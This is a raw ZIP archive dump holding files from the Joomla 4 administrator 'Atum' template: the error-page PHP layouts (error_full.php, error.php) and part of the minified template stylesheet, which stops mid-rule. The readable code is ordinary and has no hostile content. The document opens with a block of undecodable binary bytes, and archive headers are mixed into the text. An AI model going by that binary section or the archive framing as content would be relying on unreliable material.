���y��F���"�,Oж��t�L��'�JZ/��B��-�{Ν.��^�ѝ{��T�&��JUCu���TM��	�,z{�K�ε����]�66RI_�KS��DBAl����b�D�\!�7��ƥ�3���n�s?�$��C��;?9u��+U-͑���ں:j"!�Y�p���gF�NI�Z���WutmC���UƆ��^F��ۻ����;���c�/1�7(`�؁�HH���]��S���.�����&i�v�&Uڴ�M�U/Zij�I��:Mݴ�*k&�M�%KK
�CR^
�	o�-���}�.�KH�B���?҉t�	���9�?�y���b),�lԣ(G	M�~6IWg�@���Hh��W�0�7�t�����@6�dK�M�Xl�"O����	�w�gdq��WXD��9��g<�d=eE���a6�`"�:}�{V[	��|X�5l\#����5�͗�t�8�i�~�������K��Ad�k����B��>Ƨ�X��瘉�ʷ�������#a�7>C�>Jss�y:.���w�^�eV4c�1WZ	�+)5�je.�܇p
q���>����Ԝ�ʚ�|t����I���m%`0R��0ZN'�ɊE��j:vz�(1��i�
l���Ѥ=02��//Ė�i��"D�f�,�u�l���[����߮�$c��Rg�O˧<~hw��X��M�W�{�O���7�1�>inƶ��~�cEjܝ� C�`�fH��ii6!8^�|�DY��m�$U�
���Ay�zv9s���R�m0J�#��-�{ �4H��k��
Bl=2�	h$��_��������!�ɑ������k �{�E-��d^�'������-���P�-J��^
�p�[x�[�@!���wm�-��!�f��#C}4��>�����[J��,�'��Bl]�L��>���z[	�F�|���QzF�T.�?K(�|y$8�ٶn�h��ބKQ	!V'��K��ŋ/���o���x��^���-a�
O�ngU�R��'��<"�����p�wO��g�=��:��o225�۽���cS�df�cVC�f�/.Ţ��
�b���g#�_�¨�w�
�qk|����
cv��"�&z��߮�X���9����� ��6G9�~?Z����2q9�W.D�s�ttt�)��/>�/_~��5�X�=Ǧb������(DU���9 ��X��L/@�ޖ�~B���tJ�çi���8������[�����Pk����?�A7�oPaRx��ə�A��lw��󿮠&8T[�F�?x�\W-���r�<�=���>~���O
��+���GQ�N��&�j;�0���!�q�gZ�ٳ��F�E"�x$�&U�ؼ�ŪO��a!��Ґnl�O�5���q5abbU��Y��
fRT�Cx����
r����k4��Qɔ�Dan6A��f�҂�'��!��,#�����]�׾��̅s�eq�j/�P�
�n
��<Z�a���wN�fg�
,�bB���@uu�=��W����jG�};����2�6p�!���ɋ!B��;[�Z��ݮ���9�J�np����_=��<=_m������&.�^�h�Ï~��9|�0����90͎�*�k���?�ݚ�ύ0����n�'^x�97;={�]����5����(X,�|�Sҟ��(˔ÏO<˘��?�v�o>��ƪ655�ill���X�@��JI �G�"����[)!(�Sj�t�8�;��gN�o��߈�$?�KB<`��0��0:e�{�B�����SWWHܺ���E���!��uw��ws_k(�Hk)�	�ݟ�_�j��ʼn����P���]�O�Υ����vvH��E���f�MwIEND�B`�PK!���N N atum/error_full.phpnu&1i�<?php
/**
 * @package     Joomla.Administrator
 * @subpackage  Templates.Atum
 * @copyright   (C) 2018 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 * @since       4.0.0
 */

defined('_JEXEC') or die;

use Joomla\CMS\Factory;
use Joomla\CMS\HTML\HTMLHelper;
use Joomla\CMS\Language\Text;
use Joomla\CMS\Layout\LayoutHelper;
use Joomla\CMS\Uri\Uri;

/** @var \Joomla\CMS\Document\ErrorDocument $this */

$app   = Factory::getApplication();
$input = $app->input;
$wa    = $this->getWebAssetManager();

// Detecting Active Variables
$option     = $input->get('option', '');
$view       = $input->get('view', '');
$layout     = $input->get('layout', 'default');
$task       = $input->get('task', 'display');
$cpanel     = $option === 'com_cpanel';
$hiddenMenu = $app->input->get('hidemainmenu');

// Browsers support SVG favicons
$this->addHeadLink(HTMLHelper::_('image', 'joomla-favicon.svg', '', [], true, 1), 'icon', 'rel', ['type' => 'image/svg+xml']);
$this->addHeadLink(HTMLHelper::_('image', 'favicon.ico', '', [], true, 1), 'alternate icon', 'rel', ['type' => 'image/vnd.microsoft.icon']);
$this->addHeadLink(HTMLHelper::_('image', 'joomla-favicon-pinned.svg', '', [], true, 1), 'mask-icon', 'rel', ['color' => '#000']);

// Template params
$logoBrandLarge  = $this->params->get('logoBrandLarge')
	? Uri::root() . htmlspecialchars($this->params->get('logoBrandLarge'), ENT_QUOTES)
	: $this->baseurl . '/templates/' . $this->template . '/images/logos/brand-large.svg';
$logoBrandSmall = $this->params->get('logoBrandSmall')
	? Uri::root() . htmlspecialchars($this->params->get('logoBrandSmall'), ENT_QUOTES)
	: $this->baseurl . '/templates/' . $this->template . '/images/logos/brand-small.svg';

$logoBrandLargeAlt = empty($this->params->get('logoBrandLargeAlt')) && empty($this->params->get('emptyLogoBrandLargeAlt'))
	? 'alt=""'
	: 'alt="' . htmlspecialchars($this->params->get('logoBrandLargeAlt'), ENT_COMPAT, 'UTF-8') . '"';
$logoBrandSmallAlt = empty($this->params->get('logoBrandSmallAlt')) && empty($this->params->get('emptyLogoBrandSmallAlt'))
	? 'alt=""'
	: 'alt="' . htmlspecialchars($this->params->get('logoBrandSmallAlt'), ENT_COMPAT, 'UTF-8') . '"';

	// Get the hue value
	preg_match('#^hsla?\(([0-9]+)[\D]+([0-9]+)[\D]+([0-9]+)[\D]+([0-9](?:.\d+)?)?\)$#i', $this->params->get('hue', 'hsl(214, 63%, 20%)'), $matches);

	// Enable assets
	$wa->usePreset('template.atum.' . ($this->direction === 'rtl' ? 'rtl' : 'ltr'))
		->useStyle('template.active.language')
		->useStyle('template.user')
		->addInlineStyle(':root {
			--hue: ' . $matches[1] . ';
			--template-bg-light: ' . $this->params->get('bg-light', '#f0f4fb') . ';
			--template-text-dark: ' . $this->params->get('text-dark', '#495057') . ';
			--template-text-light: ' . $this->params->get('text-light', '#ffffff') . ';
			--template-link-color: ' . $this->params->get('link-color', '#2a69b8') . ';
			--template-special-color: ' . $this->params->get('special-color', '#001B4C') . ';
		}');

// Override 'template.active' asset to set correct ltr/rtl dependency
$wa->registerStyle('template.active', '', [], [], ['template.atum.' . ($this->direction === 'rtl' ? 'rtl' : 'ltr')]);

// Set some meta data
$this->setMetaData('viewport', 'width=device-width, initial-scale=1');

$monochrome = (bool) $this->params->get('monochrome');

// @see administrator/templates/atum/html/layouts/status.php
$statusModules = LayoutHelper::render('status', ['modules' => 'status']);
?>
<!DOCTYPE html>
<html lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>">
<head>
	<jdoc:include type="metas" />
	<jdoc:include type="styles" />
	<jdoc:include type="scripts" />
</head>

<body class="admin <?php echo $option . ' view-' . $view . ' layout-' . $layout . ($task ? ' task-' . $task : '') . ($monochrome ? ' monochrome' : ''); ?>">

	<noscript>
		<div class="alert alert-danger" role="alert">
			<?php echo Text::_('JGLOBAL_WARNJAVASCRIPT'); ?>
		</div>
	</noscript>

	<header id="header" class="header d-flex">
		<div class="header-title d-flex">
			<div class="d-flex align-items-center">
				<div class="logo">
					<img src="<?php echo $logoBrandLarge; ?>" <?php echo $logoBrandLargeAlt; ?>>
					<img class="logo-collapsed" src="<?php echo $logoBrandSmall; ?>" <?php echo $logoBrandSmallAlt; ?>>
				</div>
			</div>
			<jdoc:include type="modules" name="title" />
		</div>
		<?php echo $statusModules; ?>
	</header>

	<div id="wrapper" class="d-flex wrapper<?php echo $hiddenMenu ? '0' : ''; ?>">
		<div class="container-fluid container-main">
			<?php if (!$cpanel) : ?>
				<a class="btn btn-subhead d-md-none d-lg-none d-xl-none" data-bs-toggle="collapse"
				   data-bs-target=".subhead-collapse"><?php echo Text::_('TPL_ATUM_TOOLBAR'); ?>
					<span class="icon-wrench"></span></a>
				<div id="subhead" class="subhead mb-3">
					<div id="container-collapse" class="container-collapse"></div>
					<div class="row">
						<div class="col-md-12">
							<jdoc:include type="modules" name="toolbar" style="none" />
						</div>
					</div>
				</div>
			<?php endif; ?>
			<section id="content" class="content">
				<jdoc:include type="message" />
				<jdoc:include type="modules" name="top" style="html5" />
				<div class="row">
					<div class="col-md-12">
						<h1><?php echo Text::_('JERROR_AN_ERROR_HAS_OCCURRED'); ?></h1>
						<blockquote class="blockquote">
							<span class="badge bg-secondary"><?php echo $this->error->getCode(); ?></span>
							<?php echo htmlspecialchars($this->error->getMessage(), ENT_QUOTES, 'UTF-8'); ?>
						</blockquote>
						<?php if ($this->debug) : ?>
							<div>
								<?php echo $this->renderBacktrace(); ?>
								<?php // Check if there are more Exceptions and render their data as well ?>
								<?php if ($this->error->getPrevious()) : ?>
									<?php $loop = true; ?>
									<?php // Reference $this->_error here and in the loop as setError() assigns errors to this property and we need this for the backtrace to work correctly ?>
									<?php // Make the first assignment to setError() outside the loop so the loop does not skip Exceptions ?>
									<?php $this->setError($this->_error->getPrevious()); ?>
									<?php while ($loop === true) : ?>
										<p><strong><?php echo Text::_('JERROR_LAYOUT_PREVIOUS_ERROR'); ?></strong></p>
										<p><?php echo htmlspecialchars($this->_error->getMessage(), ENT_QUOTES, 'UTF-8'); ?></p>
										<?php echo $this->renderBacktrace(); ?>
										<?php $loop = $this->setError($this->_error->getPrevious()); ?>
									<?php endwhile; ?>
									<?php // Reset the main error object to the base error ?>
									<?php $this->setError($this->error); ?>
								<?php endif; ?>
							</div>
						<?php endif; ?>
						<p>
							<a href="<?php echo $this->baseurl; ?>" class="btn btn-secondary">
								<span class="icon-dashboard" aria-hidden="true"></span>
								<?php echo Text::_('JGLOBAL_TPL_CPANEL_LINK_TEXT'); ?></a>
						</p>
					</div>

					<?php if ($this->countModules('bottom')) : ?>
						<jdoc:include type="modules" name="bottom" style="html5" />
					<?php endif; ?>
				</div>
			</section>
		</div>

		<?php if (!$hiddenMenu) : ?>
			<button class="navbar-toggler toggler-burger collapsed" type="button" data-bs-toggle="collapse" data-bs-target="#sidebar-wrapper" aria-controls="sidebar-wrapper" aria-expanded="false" aria-label="<?php echo Text::_('JTOGGLE_SIDEBAR_MENU'); ?>">
				<span class="navbar-toggler-icon"></span>
			</button>

			<div id="sidebar-wrapper" class="sidebar-wrapper sidebar-menu" <?php echo $hiddenMenu ? 'data-hidden="' . $hiddenMenu . '"' : ''; ?>>
				<div id="sidebarmenu">
					<div class="sidebar-toggle item item-level-1">
						<a id="menu-collapse" href="#" aria-label="<?php echo Text::_('JTOGGLE_SIDEBAR_MENU'); ?>">
							<span id="menu-collapse-icon" class="icon-toggle-off icon-fw" aria-hidden="true"></span>
							<span class="sidebar-item-title"><?php echo Text::_('JTOGGLE_SIDEBAR_MENU'); ?></span>
						</a>
					</div>
					<jdoc:include type="modules" name="menu" style="none" />
				</div>
			</div>
		<?php endif; ?>
	</div>
	<jdoc:include type="modules" name="debug" style="none" />
</body>
</html>
PK!R�--atum/error.phpnu&1i�<?php
/**
 * @package     Joomla.Administrator
 * @subpackage  Templates.Atum
 * @copyright   (C) 2017 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 * @since       4.0.0
 */

defined('_JEXEC') or die;

use Joomla\CMS\Factory;

/** @var \Joomla\CMS\Document\ErrorDocument $this */

// Authenticated versus guest have different displays
$user = Factory::getUser();

if ($user->guest)
{
	require __DIR__ . '/error_login.php';
}
else
{
	require __DIR__ . '/error_full.php';
}
PK!�ce�~�~atum/css/template.min.cssnu&1i�@charset "UTF-8";:root{--card-bg:hsla(0,0%,100%,0.7);--bluegray:#b2bfcd;--lightbluegray:#f6f9fc;--toolbar-bg:#fff;--success-border:var(--success);--info-border:var(--info);--warning-border:var(--warning);--danger-border:var(--danger);--login-main-bg:#0b1c32;--border:#cdcdcd;--white:#fff;--white-offset:#fefefe;--focus:#39f;--focus-shadow:0 0 0 0.2rem #eaeaea;--toggle-color:#fff;--template-sidebar-bg:var(--template-bg-dark-80);--template-sidebar-font-color:#fff;--template-sidebar-link-color:#fff;--template-bg-light:#f0f4fb;--template-text-light:#fff;--template-special-color:#001b4c;--template-link-color:#2a69b8;--template-link-hover-color:#173a65;--template-contrast:#2a69b8;--template-bg-dark:hsl(var(--hue),40%,20%);--template-bg-dark-3:hsl(var(--hue),40%,97%);--template-bg-dark-5:hsl(var(--hue),40%,95%);--template-bg-dark-7:hsl(var(--hue),40%,93%);--template-bg-dark-10:hsl(var(--hue),40%,90%);--template-bg-dark-15:hsl(var(--hue),40%,85%);--template-bg-dark-20:hsl(var(--hue),40%,80%);--template-bg-dark-30:hsl(var(--hue),40%,70%);--template-bg-dark-40:hsl(var(--hue),40%,60%);--template-bg-dark-50:hsl(var(--hue),40%,50%);--template-bg-dark-60:hsl(var(--hue),40%,40%);--template-bg-dark-65:hsl(var(--hue),40%,35%);--template-bg-dark-70:hsl(var(--hue),40%,30%);--template-bg-dark-75:hsl(var(--hue),40%,25%);--template-bg-dark-80:hsl(var(--hue),40%,20%);--template-bg-dark-90:hsl(var(--hue),40%,10%);--primary:#132f53;--secondary:#495057;--success:#457d54;--info:#2a69b8;--warning:#ffb514;--danger:#c52827;--light:#f8f9fa;--dark:#212529;--atum-link-color:#2a69b8;--atum-text-dark:#495057;--action:#132f53;--error:#3b0d0c;--alert-success:#0f2f21;--font-sans-serif:"Roboto",-apple-system,BlinkMacSystemFont,"Segoe UI","Helvetica Neue",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--font-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace;--gradient:linear-gradient(180deg,hsla(0,0%,100%,0.15),hsla(0,0%,100%,0))}*,:after,:before{box-sizing:border-box}@media (prefers-reduced-motion:no-preference){:root{scroll-behavior:smooth}}body{font-family:var(--font-sans-serif);font-size:1rem;font-weight:400;line-height:1.5;color:var(--template-text-dark);background-color:#fff;-webkit-text-size-adjust:100%;-webkit-tap-highlight-color:rgba(0,0,0,0)}hr{margin:1rem 0;color:inherit;background-color:currentColor;border:0;opacity:.25}hr:not([size]){height:1px}.h1,.h2,.h3,.h4,.h5,.h6,h1,h2,h3,h4,h5,h6{margin-top:0;margin-bottom:.5rem;font-weight:500;line-height:1.2;color:var(--template-bg-dark)}.h1,h1{font-size:calc(1.29rem + .48vw)}@media (min-width:1200px){.h1,h1{font-size:1.65rem}}.h2,h2{font-size:calc(1.275rem + .3vw)}@media (min-width:1200px){.h2,h2{font-size:1.5rem}}.h3,h3{font-size:1.25rem}.h4,h4{font-size:1rem}.h5,h5{font-size:.9286rem}.h6,h6{font-size:.8571rem}p{margin-top:0;margin-bottom:1rem}abbr[data-bs-original-title],abbr[title]{-webkit-text-decoration:underline dotted;text-decoration:underline dotted;cursor:help;-webkit-text-decoration-skip-ink:none;text-decoration-skip-ink:none}address{margin-bottom:1rem;font-style:normal;line-height:inherit}ol,ul{padding-left:2rem}dl,ol,ul{margin-top:0;margin-bottom:1rem}ol ol,ol ul,ul ol,ul ul{margin-bottom:0}dt{font-weight:700}dd{margin-bottom:.5rem;margin-left:0}blockquote{margin:0 0 1rem}b,strong{font-weight:bolder}.small,small{font-size:.875em}.mark,mark{padding:.2em;background-color:#fcf8e3}sub,sup{position:relative;font-size:.75em;line-height:0;vertical-align:baseline}sub{bottom:-.25em}sup{top:-.5em}a{color:var(--template-link-color);text-decoration:none}a:hover{color:var(--template-link-hover-color)}a:not([href]):not([class]),a:not([href]):not([class]):hover{color:inherit;text-decoration:none}code,kbd,pre,samp{font-family:var(--font-monospace);font-size:1em;direction:ltr;unicode-bidi:bidi-override}pre{display:block;margin-top:0;margin-bottom:1rem;overflow:auto;font-size:.875em}pre code{font-size:inherit;color:inherit;word-break:normal}code{font-size:.875em;color:#971250;word-wrap:break-word}a>code{color:inherit}kbd{padding:.2rem .4rem;font-size:.875em;color:#fff;background-color:#212529;border-radius:.2rem}kbd kbd{padding:0;font-size:1em;font-weight:700}figure{margin:0 0 1rem}img,svg{vertical-align:middle}table{caption-side:bottom;border-collapse:collapse}caption{padding-top:.75rem;padding-bottom:.75rem;color:#666e76;text-align:left}tbody,td,tfoot,th,thead,tr{border:0 solid;border-color:inherit}label{display:inline-block}button{border-radius:0}button:focus:not(:focus-visible){outline:0}button,input,optgroup,select,textarea{margin:0;font-family:inherit;font-size:inherit;line-height:inherit}button,select{text-transform:none}[role=button]{cursor:pointer}select{word-wrap:normal}select:disabled{opacity:1}[list]::-webkit-calendar-picker-indicator{display:none}[type=button],[type=reset],[type=submit],button{-webkit-appearance:button}[type=button]:not(:disabled),[type=reset]:not(:disabled),[type=submit]:not(:disabled),button:not(:disabled){cursor:pointer}::-moz-focus-inner{padding:0;border-style:none}textarea{resize:vertical}fieldset{min-width:0;padding:0;margin:0;border:0}legend{float:left;width:100%;padding:0;margin-bottom:.5rem;font-size:calc(1.275rem + .3vw);line-height:inherit}@media (min-width:1200px){legend{font-size:1.5rem}}legend+*{clear:left}::-webkit-datetime-edit-day-field,::-webkit-datetime-edit-fields-wrapper,::-webkit-datetime-edit-hour-field,::-webkit-datetime-edit-minute,::-webkit-datetime-edit-month-field,::-webkit-datetime-edit-text,::-webkit-datetime-edit-year-field{padding:0}::-webkit-inner-spin-button{height:auto}[type=search]{outline-offset:-2px;-webkit-appearance:textfield}::-webkit-search-decoration{-webkit-appearance:none}::-webkit-color-swatch-wrapper{padding:0}::file-selector-button{font:inherit}::-webkit-file-upload-button{font:inherit;-webkit-appearance:button}output{display:inline-block}summary{display:list-item;cursor:pointer}progress{vertical-align:baseline}[hidden]{display:none!important}.lead{font-size:1.25rem;font-weight:300}.display-1{font-size:calc(1.625rem + 4.5vw);font-weight:300;line-height:1.2}@media (min-width:1200px){.display-1{font-size:5rem}}.display-2{font-size:calc(1.575rem + 3.9vw);font-weight:300;line-height:1.2}@media (min-width:1200px){.display-2{font-size:4.5rem}}.display-3{font-size:calc(1.525rem + 3.3vw);font-weight:300;line-height:1.2}@media (min-width:1200px){.display-3{font-size:4rem}}.display-4{font-size:calc(1.475rem + 2.7vw);font-weight:300;line-height:1.2}@media (min-width:1200px){.display-4{font-size:3.5rem}}.display-5{font-size:calc(1.425rem + 2.1vw);font-weight:300;line-height:1.2}@media (min-width:1200px){.display-5{font-size:3rem}}.display-6{font-size:calc(1.375rem + 1.5vw);font-weight:300;line-height:1.2}@media (min-width:1200px){.display-6{font-size:2.5rem}}.list-inline,.list-unstyled{padding-left:0;list-style:none}.list-inline-item{display:inline-block}.list-inline-item:not(:last-child){margin-right:.5rem}.initialism{font-size:.875em;text-transform:uppercase}.blockquote{margin-bottom:1rem;font-size:1.25rem}.blockquote>:last-child{margin-bottom:0}.blockquote-footer{margin-top:-1rem;margin-bottom:1rem;font-size:.875em;color:#666e76}.blockquote-footer:before{content:"— "}.img-fluid,.img-thumbnail{max-width:100%;height:auto}.img-thumbnail{padding:.25rem;background-color:#fff;border:1px solid #dee2e6;border-radius:.25rem}.figure{display:inline-block}.figure-img{margin-bottom:.5rem;line-height:1}.figure-caption{font-size:.875em;color:#666e76}.container,.container-fluid,.container-lg,.container-md,.container-sm,.container-xl,.container-xxl{width:100%;padding-right:var(--gutter-x,1rem);padding-left:var(--gutter-x,1rem);margin-right:auto;margin-left:auto}@media (min-width:576px){.container,.container-sm{max-width:540px}}@media (min-width:768px){.container,.container-md,.container-sm{max-width:720px}}@media (min-width:992px){.container,.container-lg,.container-md,.container-sm{max-width:960px}}@media (min-width:1200px){.container,.container-lg,.container-md,.container-sm,.container-xl{max-width:1140px}}@media (min-width:1400px){.container,.container-lg,.container-md,.container-sm,.container-xl,.container-xxl{max-width:1320px}}.row{--gutter-x:2rem;--gutter-y:0;display:flex;flex-wrap:wrap;margin-top:calc(var(--gutter-y)*-1);margin-right:calc(var(--gutter-x)*-0.5);margin-left:calc(var(--gutter-x)*-0.5)}.row>*{flex-shrink:0;width:100%;max-width:100%;padding-right:calc(var(--gutter-x)*0.5);padding-left:calc(var(--gutter-x)*0.5);margin-top:var(--gutter-y)}.col{flex:1 0 0%}.row-cols-auto>*{flex:0 0 auto;width:auto}.row-cols-1>*{flex:0 0 auto;width:100%}.row-cols-2>*{flex:0 0 auto;width:50%}.row-cols-3>*{flex:0 0 auto;width:33.3333333333%}.row-cols-4>*{flex:0 0 auto;width:25%}.row-cols-5>*{flex:0 0 auto;width:20%}.row-cols-6>*{flex:0 0 auto;width:16.6666666667%}@media (min-width:576px){.col-sm{flex:1 0 0%}.row-cols-sm-auto>*{flex:0 0 auto;width:auto}.row-cols-sm-1>*{flex:0 0 auto;width:100%}.row-cols-sm-2>*{flex:0 0 auto;width:50%}.row-cols-sm-3>*{flex:0 0 auto;width:33.3333333333%}.row-cols-sm-4>*{flex:0 0 auto;width:25%}.row-cols-sm-5>*{flex:0 0 auto;width:20%}.row-cols-sm-6>*{flex:0 0 auto;width:16.6666666667%}}@media (min-width:768px){.col-md{flex:1 0 0%}.row-cols-md-auto>*{flex:0 0 auto;width:auto}.row-cols-md-1>*{flex:0 0 auto;width:100%}.row-cols-md-2>*{flex:0 0 auto;width:50%}.row-cols-md-3>*{flex:0 0 auto;width:33.3333333333%}.row-cols-md-4>*{flex:0 0 auto;width:25%}.row-cols-md-5>*{flex:0 0 auto;width:20%}.row-cols-md-6>*{flex:0 0 auto;width:16.6666666667%}}@media (min-width:992px){.col-lg{flex:1 0 0%}.row-cols-lg-auto>*{flex:0 0 auto;width:auto}.row-cols-lg-1>*{flex:0 0 auto;width:100%}.row-cols-lg-2>*{flex:0 0 auto;width:50%}.row-cols-lg-3>*{flex:0 0 auto;width:33.3333333333%}.row-cols-lg-4>*{flex:0 0 auto;width:25%}.row-cols-lg-5>*{flex:0 0 auto;width:20%}.row-cols-lg-6>*{flex:0 0 auto;width:16.6666666667%}}@media (min-width:1200px){.col-xl{flex:1 0 0%}.row-cols-xl-auto>*{flex:0 0 auto;width:auto}.row-cols-xl-1>*{flex:0 0 auto;width:100%}.row-cols-xl-2>*{flex:0 0 auto;width:50%}.row-cols-xl-3>*{flex:0 0 auto;width:33.3333333333%}.row-cols-xl-4>*{flex:0 0 auto;width:25%}.row-cols-xl-5>*{flex:0 0 auto;width:20%}.row-cols-xl-6>*{flex:0 0 auto;width:16.6666666667%}}@media (min-width:1400px){.col-xxl{flex:1 0 0%}.row-cols-xxl-auto>*{flex:0 0 auto;width:auto}.row-cols-xxl-1>*{flex:0 0 auto;width:100%}.row-cols-xxl-2>*{flex:0 0 auto;width:50%}.row-cols-xxl-3>*{flex:0 0 auto;width:33.3333333333%}.row-cols-xxl-4>*{flex:0 0 auto;width:25%}.row-cols-xxl-5>*{flex:0 0 auto;width:20%}.row-cols-xxl-6>*{flex:0 0 auto;width:16.6666666667%}}.col-auto{flex:0 0 auto;width:auto}.col-1{flex:0 0 auto;width:8.33333333%}.col-2{flex:0 0 auto;width:16.66666667%}.col-3{flex:0 0 auto;width:25%}.col-4{flex:0 0 auto;width:33.33333333%}.col-5{flex:0 0 auto;width:41.66666667%}.col-6{flex:0 0 auto;width:50%}.col-7{flex:0 0 auto;width:58.33333333%}.col-8{flex:0 0 auto;width:66.66666667%}.col-9{flex:0 0 auto;width:75%}.col-10{flex:0 0 auto;width:83.33333333%}.col-11{flex:0 0 auto;width:91.66666667%}.col-12{flex:0 0 auto;width:100%}.offset-1{margin-left:8.33333333%}.offset-2{margin-left:16.66666667%}.offset-3{margin-left:25%}.offset-4{margin-left:33.33333333%}.offset-5{margin-left:41.66666667%}.offset-6{margin-left:50%}.offset-7{margin-left:58.33333333%}.offset-8{margin-left:66.66666667%}.offset-9{margin-left:75%}.offset-10{margin-left:83.33333333%}.offset-11{margin-left:91.66666667%}.g-0,.gx-0{--gutter-x:0}.g-0,.gy-0{--gutter-y:0}.g-1,.gx-1{--gutter-x:0.25rem}.g-1,.gy-1{--gutter-y:0.25rem}.g-2,.gx-2{--gutter-x:0.5rem}.g-2,.gy-2{--gutter-y:0.5rem}.g-3,.gx-3{--gutter-x:1rem}.g-3,.gy-3{--gutter-y:1rem}.g-4,.gx-4{--gutter-x:1.5rem}.g-4,.gy-4{--gutter-y:1.5rem}.g-5,.gx-5{--gutter-x:3rem}.g-5,.gy-5{--gutter-y:3rem}@media (min-width:576px){.col-sm-auto{flex:0 0 auto;width:auto}.col-sm-1{flex:0 0 auto;width:8.33333333%}.col-sm-2{flex:0 0 auto;width:16.66666667%}.col-sm-3{flex:0 0 auto;width:25%}.col-sm-4{flex:0 0 auto;width:33.33333333%}.col-sm-5{flex:0 0 auto;width:41.66666667%}.col-sm-6{flex:0 0 auto;width:50%}.col-sm-7{flex:0 0 auto;width:58.33333333%}.col-sm-8{flex:0 0 auto;width:66.66666667%}.col-sm-9{flex:0 0 auto;width:75%}.col-sm-10{flex:0 0 auto;width:83.33333333%}.col-sm-11{flex:0 0 auto;width:91.66666667%}.col-sm-12{flex:0 0 auto;width:100%}.offset-sm-0{margin-left:0}.offset-sm-1{margin-left:8.33333333%}.offset-sm-2{margin-left:16.66666667%}.offset-sm-3{margin-left:25%}.offset-sm-4{margin-left:33.33333333%}.offset-sm-5{margin-left:41.66666667%}.offset-sm-6{margin-left:50%}.offset-sm-7{margin-left:58.33333333%}.offset-sm-8{margin-left:66.66666667%}.offset-sm-9{margin-left:75%}.offset-sm-10{margin-left:83.33333333%}.offset-sm-11{margin-left:91.66666667%}.g-sm-0,.gx-sm-0{--gutter-x:0}.g-sm-0,.gy-sm-0{--gutter-y:0}.g-sm-1,.gx-sm-1{--gutter-x:0.25rem}.g-sm-1,.gy-sm-1{--gutter-y:0.25rem}.g-sm-2,.gx-sm-2{--gutter-x:0.5rem}.g-sm-2,.gy-sm-2{--gutter-y:0.5rem}.g-sm-3,.gx-sm-3{--gutter-x:1rem}.g-sm-3,.gy-sm-3{--gutter-y:1rem}.g-sm-4,.gx-sm-4{--gutter-x:1.5rem}.g-sm-4,.gy-sm-4{--gutter-y:1.5rem}.g-sm-5,.gx-sm-5{--gutter-x:3rem}.g-sm-5,.gy-sm-5{--gutter-y:3rem}}@media (min-width:768px){.col-md-auto{flex:0 0 auto;width:auto}.col-md-1{flex:0 0 auto;width:8.33333333%}.col-md-2{flex:0 0 auto;width:16.66666667%}.col-md-3{flex:0 0 auto;width:25%}.col-md-4{flex:0 0 auto;width:33.33333333%}.col-md-5{flex:0 0 auto;width:41.66666667%}.col-md-6{flex:0 0 auto;width:50%}.col-md-7{flex:0 0 auto;width:58.33333333%}.col-md-8{flex:0 0 auto;width:66.66666667%}.col-md-9{flex:0 0 auto;width:75%}.col-md-10{flex:0 0 auto;width:83.33333333%}.col-md-11{flex:0 0 auto;width:91.66666667%}.col-md-12{flex:0 0 auto;width:100%}.offset-md-0{margin-left:0}.offset-md-1{margin-left:8.33333333%}.offset-md-2{margin-left:16.66666667%}.offset-md-3{margin-left:25%}.offset-md-4{margin-left:33.33333333%}.offset-md-5{margin-left:41.66666667%}.offset-md-6{margin-left:50%}.offset-md-7{margin-left:58.33333333%}.offset-md-8{margin-left:66.66666667%}.offset-md-9{margin-left:75%}.offset-md-10{margin-left:83.33333333%}.offset-md-11{margin-left:91.66666667%}.g-md-0,.gx-md-0{--gutter-x:0}.g-md-0,.gy-md-0{--gutter-y:0}.g-md-1,.gx-md-1{--gutter-x:0.25rem}.g-md-1,.gy-md-1{--gutter-y:0.25rem}.g-md-2,.gx-md-2{--gutter-x:0.5rem}.g-md-2,.gy-md-2{--gutter-y:0.5rem}.g-md-3,.gx-md-3{--gutter-x:1rem}.g-md-3,.gy-md-3{--gutter-y:1rem}.g-md-4,.gx-md-4{--gutter-x:1.5rem}.g-md-4,.gy-md-4{--gutter-y:1.5rem}.g-md-5,.gx-md-5{--gutter-x:3rem}.g-md-5,.gy-md-5{--gutter-y:3rem}}@media (min-width:992px){.col-lg-auto{flex:0 0 auto;width:auto}.col-lg-1{flex:0 0 auto;width:8.33333333%}.col-lg-2{flex:0 0 auto;width:16.66666667%}.col-lg-3{flex:0 0 auto;width:25%}.col-lg-4{flex:0 0 auto;width:33.33333333%}.col-lg-5{flex:0 0 auto;width:41.66666667%}.col-lg-6{flex:0 0 auto;width:50%}.col-lg-7{flex:0 0 auto;width:58.33333333%}.col-lg-8{flex:0 0 auto;width:66.66666667%}.col-lg-9{flex:0 0 auto;width:75%}.col-lg-10{flex:0 0 auto;width:83.33333333%}.col-lg-11{flex:0 0 auto;width:91.66666667%}.col-lg-12{flex:0 0 auto;width:100%}.offset-lg-0{margin-left:0}.offset-lg-1{margin-left:8.33333333%}.offset-lg-2{margin-left:16.66666667%}.offset-lg-3{margin-left:25%}.offset-lg-4{margin-left:33.33333333%}.offset-lg-5{margin-left:41.66666667%}.offset-lg-6{margin-left:50%}.offset-lg-7{margin-left:58.33333333%}.offset-lg-8{margin-left:66.66666667%}.offset-lg-9{margin-left:75%}.offset-lg-10{margin-left:83.33333333%}.offset-lg-11{margin-left:91.66666667%}.g-lg-0,.gx-lg-0{--gutter-x:0}.g-lg-0,.gy-lg-0{--gutter-y:0}.g-lg-1,.gx-lg-1{--gutter-x:0.25rem}.g-lg-1,.gy-lg-1{--gutter-y:0.25rem}.g-lg-2,.gx-lg-2{--gutter-x:0.5rem}.g-lg-2,.gy-lg-2{--gutter-y:0.5rem}.g-lg-3,.gx-lg-3{--gutter-x:1rem}.g-lg-3,.gy-lg-3{--gutter-y:1rem}.g-lg-4,.gx-lg-4{--gutter-x:1.5rem}.g-lg-4,.gy-lg-4{--gutter-y:1.5rem}.g-lg-5,.gx-lg-5{--gutter-x:3rem}.g-lg-5,.gy-lg-5{--gutter-y:3rem}}@media (min-width:1200px){.col-xl-auto{flex:0 0 auto;width:auto}.col-xl-1{flex:0 0 auto;width:8.33333333%}.col-xl-2{flex:0 0 auto;width:16.66666667%}.col-xl-3{flex:0 0 auto;width:25%}.col-xl-4{flex:0 0 auto;width:33.33333333%}.col-xl-5{flex:0 0 auto;width:41.66666667%}.col-xl-6{flex:0 0 